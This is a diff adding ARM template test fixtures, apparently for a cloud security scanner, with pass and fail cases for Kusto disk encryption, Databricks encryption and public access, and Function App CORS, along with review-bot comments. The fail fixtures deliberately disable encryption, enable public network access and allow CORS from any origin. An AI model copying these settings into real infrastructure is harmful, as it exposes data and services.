"eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]", + "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]" + }, + "resources": [ + { + "type": 
"Microsoft.EventHub/namespaces/eventhubs/consumergroups", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "properties": {}, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces/eventhubs", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "properties": { + "messageRetentionInDays": 2, + "partitionCount": 2 + }, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/scripts", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]", + "properties": { + "scriptContent": "// Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n// Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n// We modify the ingestion batching policy to make it easy to see records coming ingestion\n// THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION: MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"", + "continueOnErrors": false + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/dataConnections", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]", + 
"location": "[parameters('location')]", + "kind": "EventHub", + "properties": { + "compression": "None", + "consumerGroup": "kustoConsumerGroup", + "dataFormat": "MULTIJSON", + "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "eventSystemProperties": [ + "x-opt-enqueued-time" + ], + "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "mappingRuleName": "DirectJson", + "tableName": "RawEvents" + }, + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]", + "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]", + "location": "[parameters('location')]", + "kind": "ReadWrite", + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces", + "apiVersion": "2021-11-01", + "name": "[parameters('eventHubNamespaceName')]", + "location": "[parameters('location')]", + "sku": { + "capacity": 1, + "name": "Standard", + "tier": "Standard" + }, + "properties": {} + }, + { + "type": "Microsoft.Kusto/clusters", + "apiVersion": 
"2022-02-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('skuCapacity')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "enableDiskEncryption":false + } + }, + { + "type": "Microsoft.Authorization/roleAssignments", + "apiVersion": "2021-04-01-preview", + "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "name": "[variables('roleAssignmentName')]", + "properties": { + "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster", + "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]", + "principalType": "ServicePrincipal", + "roleDefinitionId": "[variables('fullDataReceiverId')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json new file mode 100644 index 00000000000..a86aa7945a7 --- /dev/null +++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json 
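Review bot: fail.json is a 186-line Event Hub plus Kusto quickstart in which only `"enableDiskEncryption":false` on the `Microsoft.Kusto/clusters` resource matters for this check, and pass.json (the following hunk) repeats the whole template with that value flipped to true. Trimming both to the cluster resource, as the Automation and Cognitive Services fixtures in this commit do, would make the fail/pass difference a one-line diff and drop incidental content such as the `scriptContent` block and the role assignment with its `reference(...).identity.principalId` expression, which the check does not evaluate but the parser has to tolerate. If the extra resources are intentionally kept to exercise the parser, a short comment in the test that loads the fixture should say so.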
@@ -0,0 +1,186 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "11556612112757819680" + } + }, + "parameters": { + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources" + } + }, + "clusterName": { + "type": "string", + "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of the cluster" + } + }, + "skuName": { + "type": "string", + "defaultValue": "Standard_D12_v2", + "metadata": { + "description": "Name of the sku" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "maxValue": 1000, + "minValue": 2, + "metadata": { + "description": "# of nodes" + } + }, + "databaseName": { + "type": "string", + "defaultValue": "kustodb", + "metadata": { + "description": "Name of the database" + } + }, + "eventHubNamespaceName": { + "type": "string", + "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of Event Hub's namespace" + } + }, + "eventHubName": { + "type": "string", + "defaultValue": "kustoHub", + "metadata": { + "description": "Name of Event Hub" + } + } + }, + "variables": { + "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde", + "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]", + "eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]", + "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]" + }, + "resources": [ + { + "type": 
"Microsoft.EventHub/namespaces/eventhubs/consumergroups", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "properties": {}, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces/eventhubs", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "properties": { + "messageRetentionInDays": 2, + "partitionCount": 2 + }, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/scripts", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]", + "properties": { + "scriptContent": "// Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n// Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n// We modify the ingestion batching policy to make it easy to see records coming ingestion\n// THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION: MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"", + "continueOnErrors": false + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/dataConnections", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]", + 
"location": "[parameters('location')]", + "kind": "EventHub", + "properties": { + "compression": "None", + "consumerGroup": "kustoConsumerGroup", + "dataFormat": "MULTIJSON", + "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "eventSystemProperties": [ + "x-opt-enqueued-time" + ], + "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "mappingRuleName": "DirectJson", + "tableName": "RawEvents" + }, + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]", + "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]", + "location": "[parameters('location')]", + "kind": "ReadWrite", + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces", + "apiVersion": "2021-11-01", + "name": "[parameters('eventHubNamespaceName')]", + "location": "[parameters('location')]", + "sku": { + "capacity": 1, + "name": "Standard", + "tier": "Standard" + }, + "properties": {} + }, + { + "type": "Microsoft.Kusto/clusters", + "apiVersion": 
"2022-02-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('skuCapacity')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "enableDiskEncryption":true + } + }, + { + "type": "Microsoft.Authorization/roleAssignments", + "apiVersion": "2021-04-01-preview", + "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "name": "[variables('roleAssignmentName')]", + "properties": { + "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster", + "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]", + "principalType": "ServicePrincipal", + "roleDefinitionId": "[variables('fullDataReceiverId')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json new file mode 100644 index 00000000000..b8ca21f4a5b --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json 
@@ -0,0 +1,68 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "managedResourceGroupName": {
+ "type": "string"
+ },
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Databricks workspace to create."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "pricingTier": {
+ "type": "string",
+ "allowedValues": [
+ "standard",
+ "premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of workspace."
+ }
+ },
+ "keyVaultName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault encryption key name."
+ }
+ },
+ "disablePublicIp": {
+ "type": "bool",
+ "metadata": {
+ "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Databricks/workspaces",
+ "apiVersion": "2023-02-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('pricingTier')]"
+ },
+ "properties": {
+ "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+ "parameters": {
+ "enableNoPublicIp": {
+ "value": "[parameters('disablePublicIp')]"
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json
new file mode 100644
index 00000000000..04be1022e1e
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail2.json
@@ -0,0 +1,71 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "managedResourceGroupName": {
+ "type": "string"
+ },
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Databricks workspace to create."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "pricingTier": {
+ "type": "string",
+ "allowedValues": [
+ "standard",
+ "premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of workspace."
+ }
+ },
+ "keyVaultName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault encryption key name."
+ }
+ },
+ "disablePublicIp": {
+ "type": "bool",
+ "metadata": {
+ "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Databricks/workspaces",
+ "apiVersion": "2023-02-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('pricingTier')]"
+ },
+ "properties": {
+ "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+ "parameters": {
+ "prepareEncryption": {
+ "value": false
+ },
+ "enableNoPublicIp": {
+ "value": "[parameters('disablePublicIp')]"
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json
new file mode 100644
index 00000000000..ae285e6fc7c
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/pass.json
@@ -0,0 +1,78 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "managedResourceGroupName": {
+ "type": "string"
+ },
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Databricks workspace to create."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "pricingTier": {
+ "type": "string",
+ "allowedValues": [
+ "standard",
+ "premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of workspace."
+ }
+ },
+ "keyVaultName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault encryption key name."
+ }
+ },
+ "disablePublicIp": {
+ "type": "bool",
+ "metadata": {
+ "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Databricks/workspaces",
+ "apiVersion": "2023-02-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('pricingTier')]"
+ },
+ "properties": {
+ "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+ "parameters": {
+ "prepareEncryption": {
+ "value": true
+ },
+ "encryption": {
+ "value": {
+ "keySource": "Microsoft.Keyvault",
+ "keyvaulturi": "[uri(format('https://{0}{1}', parameters('keyVaultName'), environment().suffixes.keyvaultDns), '/')]",
+ "KeyName": "[parameters('keyName')]"
+ }
+ },
+ "enableNoPublicIp": {
+ "value": "[parameters('disablePublicIp')]"
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
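Review bot: The three DBFS fixtures only separate `prepareEncryption` true-with-`encryption` (pass.json) from false (fail2.json) or absent (fail.json); no fixture has `"prepareEncryption": { "value": true }` without an `encryption` entry, or with a `keySource` other than `Microsoft.Keyvault`, so a check that keys on `prepareEncryption` alone would pass this suite while missing that shape. If the check is meant to inspect `encryption.keySource`, which the pass fixture implies, a fail3.json with `prepareEncryption` true and the `encryption` block removed would pin it. The pass fixture also mixes `keyvaulturi` and `KeyName` casing, which only matters if the check reads those keys. The check implementation is outside this diff, so this is inferred from the fixture set.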
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json
new file mode 100644
index 00000000000..62aa4f41eda
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json
@@ -0,0 +1,69 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "managedResourceGroupName": {
+ "type": "string"
+ },
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Databricks workspace to create."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "pricingTier": {
+ "type": "string",
+ "allowedValues": [
+ "standard",
+ "premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of workspace."
+ }
+ },
+ "keyVaultName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault encryption key name."
+ }
+ },
+ "disablePublicIp": {
+ "type": "bool",
+ "metadata": {
+ "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Databricks/workspaces",
+ "apiVersion": "2023-02-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('pricingTier')]"
+ },
+ "properties": {
+ "publicNetworkAccess": "Enabled",
+ "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+ "parameters": {
+ "enableNoPublicIp": {
+ "value": "[parameters('disablePublicIp')]"
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json
new file mode 100644
index 00000000000..b8ca21f4a5b
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json
@@ -0,0 +1,68 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "managedResourceGroupName": {
+ "type": "string"
+ },
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Databricks workspace to create."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "pricingTier": {
+ "type": "string",
+ "allowedValues": [
+ "standard",
+ "premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of workspace."
+ }
+ },
+ "keyVaultName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault encryption key name."
+ }
+ },
+ "disablePublicIp": {
+ "type": "bool",
+ "metadata": {
+ "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Databricks/workspaces",
+ "apiVersion": "2023-02-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('pricingTier')]"
+ },
+ "properties": {
+ "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+ "parameters": {
+ "enableNoPublicIp": {
+ "value": "[parameters('disablePublicIp')]"
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json
new file mode 100644
index 00000000000..64772cc8e6a
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json
@@ -0,0 +1,70 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "managedResourceGroupName": {
+ "type": "string"
+ },
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Databricks workspace to create."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "pricingTier": {
+ "type": "string",
+ "allowedValues": [
+ "standard",
+ "premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of workspace."
+ }
+ },
+ "keyVaultName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault encryption key name."
+ }
+ },
+ "disablePublicIp": {
+ "type": "bool",
+ "metadata": {
+ "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Databricks/workspaces",
+ "apiVersion": "2023-02-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('pricingTier')]"
+ },
+ "properties": {
+ "publicNetworkAccess": "Disabled",
+ "requiredNsgRules": "AllRules",
+ "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+ "parameters": {
+ "enableNoPublicIp": {
+ "value": "[parameters('disablePublicIp')]"
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
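Review bot: pass.json and pass2.json differ only in `requiredNsgRules` (`AllRules` versus `NoAzureDatabricksRules`), which suggests the check evaluates that property, yet neither fail fixture exercises it: fail.json sets `"publicNetworkAccess": "Enabled"`, fail2.json omits the property, and both leave `requiredNsgRules` out. If `requiredNsgRules` influences the verdict, a fixture with `"publicNetworkAccess": "Disabled"` and no `requiredNsgRules`, or `Enabled` paired with `NoAzureDatabricksRules`, would show which property decides; if it does not, one of the two pass fixtures is redundant. The check source is not in this hunk, so this is inferred from the fixture pair.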
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json
new file mode 100644
index 00000000000..6b687ab7b3e
--- /dev/null
+++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json
@@ -0,0 +1,70 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "managedResourceGroupName": {
+ "type": "string"
+ },
+ "workspaceName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Databricks workspace to create."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "Location for all resources."
+ }
+ },
+ "pricingTier": {
+ "type": "string",
+ "allowedValues": [
+ "standard",
+ "premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of workspace."
+ }
+ },
+ "keyVaultName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault name."
+ }
+ },
+ "keyName": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure Key Vault encryption key name."
+ }
+ },
+ "disablePublicIp": {
+ "type": "bool",
+ "metadata": {
+ "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not"
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Databricks/workspaces",
+ "apiVersion": "2023-02-01",
+ "name": "[parameters('workspaceName')]",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "[parameters('pricingTier')]"
+ },
+ "properties": {
+ "publicNetworkAccess": "Disabled",
+ "requiredNsgRules": "NoAzureDatabricksRules",
+ "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]",
+ "parameters": {
+ "enableNoPublicIp": {
+ "value": "[parameters('disablePublicIp')]"
+ }
+ }
+ }
+ }
+ ]
+ }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json
new file mode 100644
index 00000000000..a1c52a80fe6
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppDisallowCORS/fail.json
@@ -0,0 +1,81 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "siteName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the Azure Web App."
+ }
+ },
+ "location": {
+ "type": "string",
+ "metadata": {
+ "description": "The Azure region where the resource should be deployed."
+ }
+ },
+ "sku": {
+ "type": "string",
+ "defaultValue": "Free",
+ "allowedValues": [
+ "Free",
+ "Shared",
+ "Basic",
+ "Standard",
+ "Premium"
+ ],
+ "metadata": {
+ "description": "The pricing tier of the Azure Web App."
+ }
+ },
+ "appServicePlanName": {
+ "type": "string",
+ "metadata": {
+ "description": "The name of the App Service Plan to use."
+ }
+ }
+ },
+ "resources": [
+ {
+ "type": "Microsoft.Web/sites",
+ "apiVersion": "2019-08-01",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "properties": {
+ "name": "[parameters('siteName')]",
+ "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]",
+ "siteConfig": {
+ "appSettings": [
+ {
+ "name": "Setting1",
+ "value": "Value1"
+ },
+ {
+ "name": "Setting2",
+ "value": "Value2"
+ }
+ ],
+ "metadata": [
+ {
+ "name": "Key1",
+ "value": "Value1"
+ },
+ {
+ "name": "Key2",
+ "value": "Value2"
+ }
+ ],
+ "cors": {
+ "allowedOrigins": ["*"]
+ }
+ }
+ },
+ "dependsOn": [
+ "[resourceId('Microsoft.Web/serverfarms', parameters('appServicePlanName'))]"
+ ],
+ "sku": {
+ "name": "[parameters('sku')]"
+ }
+ }
+ ]
+}
\ No newline at end of file
